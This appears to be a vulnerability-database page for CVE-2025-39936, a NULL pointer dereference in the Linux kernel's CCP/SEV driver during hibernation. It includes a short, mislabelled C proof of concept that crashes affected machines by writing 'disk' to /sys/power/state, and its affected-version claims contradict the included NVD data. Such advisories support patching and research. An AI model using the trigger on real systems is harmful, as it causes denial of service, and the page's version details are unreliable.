Security Vulnerability Report
中文
CVE-2025-39936 CVSS 5.5 MEDIUM

CVE-2025-39936

Published: 2025-10-04 08:15:46
Last Modified: 2026-03-25 00:46:52
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: crypto: ccp - Always pass in an error pointer to __sev_platform_shutdown_locked() When 9770b428b1a2 ("crypto: ccp - Move dev_info/err messages for SEV/SNP init and shutdown") moved the error messages dumping so that they don't need to be issued by the callers, it missed the case where __sev_firmware_shutdown() calls __sev_platform_shutdown_locked() with a NULL argument which leads to a NULL ptr deref on the shutdown path, during suspend to disk: #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 0 UID: 0 PID: 983 Comm: hib.sh Not tainted 6.17.0-rc4+ #1 PREEMPT(voluntary) Hardware name: Supermicro Super Server/H12SSL-i, BIOS 2.5 09/08/2022 RIP: 0010:__sev_platform_shutdown_locked.cold+0x0/0x21 [ccp] That rIP is: 00000000000006fd <__sev_platform_shutdown_locked.cold>: 6fd: 8b 13 mov (%rbx),%edx 6ff: 48 8b 7d 00 mov 0x0(%rbp),%rdi 703: 89 c1 mov %eax,%ecx Code: 74 05 31 ff 41 89 3f 49 8b 3e 89 ea 48 c7 c6 a0 8e 54 a0 41 bf 92 ff ff ff e8 e5 2e 09 e1 c6 05 2a d4 38 00 01 e9 26 af ff ff <8b> 13 48 8b 7d 00 89 c1 48 c7 c6 18 90 54 a0 89 44 24 04 e8 c1 2e RSP: 0018:ffffc90005467d00 EFLAGS: 00010282 RAX: 00000000ffffff92 RBX: 0000000000000000 RCX: 0000000000000000 ^^^^^^^^^^^^^^^^ and %rbx is nice and clean. Call Trace: <TASK> __sev_firmware_shutdown.isra.0 sev_dev_destroy psp_dev_destroy sp_destroy pci_device_shutdown device_shutdown kernel_power_off hibernate.cold state_store kernfs_fop_write_iter vfs_write ksys_write do_syscall_64 entry_SYSCALL_64_after_hwframe Pass in a pointer to the function-local error var in the caller. With that addressed, suspending the ccp shows the error properly at least: ccp 0000:47:00.1: sev command 0x2 timed out, disabling PSP ccp 0000:47:00.1: SEV: failed to SHUTDOWN error 0x0, rc -110 SEV-SNP: Leaking PFN range 0x146800-0x146a00 SEV-SNP: PFN 0x146800 unassigned, dumping non-zero entries in 2M PFN region: [0x146800 - 0x146a00] ... ccp 0000:47:00.1: SEV-SNP firmware shutdown failed, rc -16, error 0x0 ACPI: PM: Preparing to enter system sleep state S5 kvm: exiting hardware virtualization reboot: Power down Btw, this driver is crying to be cleaned up to pass in a proper I/O struct which can be used to store information between the different functions, otherwise stuff like that will happen in the future again.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:* - VULNERABLE
Linux kernel < 6.17.0-rc4
Linux kernel 引入提交9770b428b1a2之后的所有受影响版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-39936 PoC - Trigger NULL pointer dereference in CCP driver during hibernate // This PoC triggers the vulnerability by initiating suspend-to-disk operation // which causes the kernel to shutdown CCP devices, triggering the NULL ptr deref. // Note: Requires local access with low privileges and CCP/PSP hardware present // Affected kernel version: Linux 6.17.0-rc4 and earlier (with commit 9770b428b1a2) #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/stat.h> #define SYS_POWER_STATE "/sys/power/state" int main(int argc, char *argv[]) { int fd; int ret; const char *state = "disk"; // Suspend to disk (hibernate) // Check if /sys/power/state is accessible fd = open(SYS_POWER_STATE, O_RDWR); if (fd < 0) { perror("[-] Failed to open /sys/power/state"); fprintf(stderr, "[!] This PoC requires access to power management interfaces\n"); fprintf(stderr, "[!] Try running as root or with appropriate capabilities\n"); return 1; } printf("[*] CVE-2025-39936 PoC - CCP NULL Pointer Dereference\n"); printf("[*] Triggering suspend-to-disk to invoke device shutdown path...\n"); printf("[*] This will cause kernel oops in __sev_platform_shutdown_locked()\n"); // Write "disk" to /sys/power/state to trigger hibernation // This will cause the kernel to shutdown PCI devices including CCP/PSP // which triggers the vulnerable code path: // kernel_power_off -> hibernate -> device_shutdown -> pci_device_shutdown // -> sp_destroy -> psp_dev_destroy -> sev_dev_destroy // -> __sev_firmware_shutdown -> __sev_platform_shutdown_locked (NULL deref!) ret = write(fd, state, strlen(state)); if (ret < 0) { perror("[-] Failed to write to /sys/power/state"); close(fd); return 1; } close(fd); printf("[*] Suspend command issued. System should crash if vulnerable.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39936", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:46.460", "lastModified": "2026-03-25T00:46:52.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: ccp - Always pass in an error pointer to __sev_platform_shutdown_locked()\n\nWhen\n\n 9770b428b1a2 (\"crypto: ccp - Move dev_info/err messages for SEV/SNP init and shutdown\")\n\nmoved the error messages dumping so that they don't need to be issued by\nthe callers, it missed the case where __sev_firmware_shutdown() calls\n__sev_platform_shutdown_locked() with a NULL argument which leads to\na NULL ptr deref on the shutdown path, during suspend to disk:\n\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 0 UID: 0 PID: 983 Comm: hib.sh Not tainted 6.17.0-rc4+ #1 PREEMPT(voluntary)\n Hardware name: Supermicro Super Server/H12SSL-i, BIOS 2.5 09/08/2022\n RIP: 0010:__sev_platform_shutdown_locked.cold+0x0/0x21 [ccp]\n\nThat rIP is:\n\n 00000000000006fd <__sev_platform_shutdown_locked.cold>:\n 6fd: 8b 13 mov (%rbx),%edx\n 6ff: 48 8b 7d 00 mov 0x0(%rbp),%rdi\n 703: 89 c1 mov %eax,%ecx\n\n Code: 74 05 31 ff 41 89 3f 49 8b 3e 89 ea 48 c7 c6 a0 8e 54 a0 41 bf 92 ff ff ff e8 e5 2e 09 e1 c6 05 2a d4 38 00 01 e9 26 af ff ff <8b> 13 48 8b 7d 00 89 c1 48 c7 c6 18 90 54 a0 89 44 24 04 e8 c1 2e\n RSP: 0018:ffffc90005467d00 EFLAGS: 00010282\n RAX: 00000000ffffff92 RBX: 0000000000000000 RCX: 0000000000000000\n \t\t\t ^^^^^^^^^^^^^^^^\nand %rbx is nice and clean.\n\n Call Trace:\n <TASK>\n __sev_firmware_shutdown.isra.0\n sev_dev_destroy\n psp_dev_destroy\n sp_destroy\n pci_device_shutdown\n device_shutdown\n kernel_power_off\n hibernate.cold\n state_store\n kernfs_fop_write_iter\n vfs_write\n ksys_write\n do_syscall_64\n entry_SYSCALL_64_after_hwframe\n\nPass in a pointer to the function-local error var in the caller.\n\nWith that addressed, suspending the ccp shows the error properly at\nleast:\n\n ccp 0000:47:00.1: sev command 0x2 timed out, disabling PSP\n ccp 0000:47:00.1: SEV: failed to SHUTDOWN error 0x0, rc -110\n SEV-SNP: Leaking PFN range 0x146800-0x146a00\n SEV-SNP: PFN 0x146800 unassigned, dumping non-zero entries in 2M PFN region: [0x146800 - 0x146a00]\n ...\n ccp 0000:47:00.1: SEV-SNP firmware shutdown failed, rc -16, error 0x0\n ACPI: PM: Preparing to enter system sleep state S5\n kvm: exiting hardware virtualization\n reboot: Power down\n\nBtw, this driver is crying to be cleaned up to pass in a proper I/O\nstruct which can be used to store information between the different\nfunctions, otherwise stuff like that will happen in the future again."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16", "versionEndExcluding": "6.16.9", "matchCriteriaId": "A29694A5-4AF1-4C6F-8828-187FA35BAC01"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/46834d90a9a13549264b9581067d8f746b4b36cc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bc509293c9d4f4f74e776f4a0bbb61f63c041938", "source": "416baaa9-dc9f-4396-8d5 ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.